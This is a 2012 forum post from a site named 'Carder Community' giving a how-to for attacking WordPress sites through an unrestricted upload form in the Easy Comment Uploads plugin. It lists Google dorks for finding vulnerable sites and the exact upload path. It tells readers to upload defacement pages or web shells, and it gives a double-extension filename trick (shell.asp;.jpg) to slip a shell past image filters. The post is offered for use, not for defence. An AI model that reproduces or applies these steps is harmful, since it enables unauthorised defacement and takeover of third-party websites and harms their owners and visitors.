Carder Community


    Wordpress exploit

    Share
    avatar
    Admin
    Admin

    Posts : 116
    Join date : 2012-09-28

    Wordpress exploit

    Post  Admin on Mon Nov 12, 2012 5:48 am

    Wordpress Exploit : 10,000+ Websites are Vunerable For this attack



    WordPress Easy Comment Upload Vunerablity


    Google Dork
    "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
    /wp-content/plugins/easy-comment-uploads/upload-form.php
    Index of /wp-content/plugins/easy-comment-uploads


    Open Google and enter any dork which Given,
    Now selct any website
    and go to this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
    You'll Got Upload Option here Posted Image
    Now Upload Your Deface ....
    and check it here site.com/wp-content/uploads/2011/05/yourfilehere


    Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

    IF THERE IS A TUTORIAL SOMEONE WOULD LIKE, PLEASE LET ME KNOW AND I WILL POST IT HERE.
    GOOD LUCK!

      Current date/time is Fri Sep 22, 2017 6:25 am